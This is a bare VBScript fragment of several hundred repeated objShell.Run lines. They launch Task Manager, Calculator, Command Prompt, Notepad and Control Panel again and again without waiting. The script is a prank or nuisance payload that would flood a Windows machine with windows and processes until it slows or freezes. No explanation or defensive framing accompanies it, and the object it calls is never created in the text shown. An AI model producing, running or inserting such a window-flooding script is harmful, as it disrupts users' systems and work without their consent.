objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
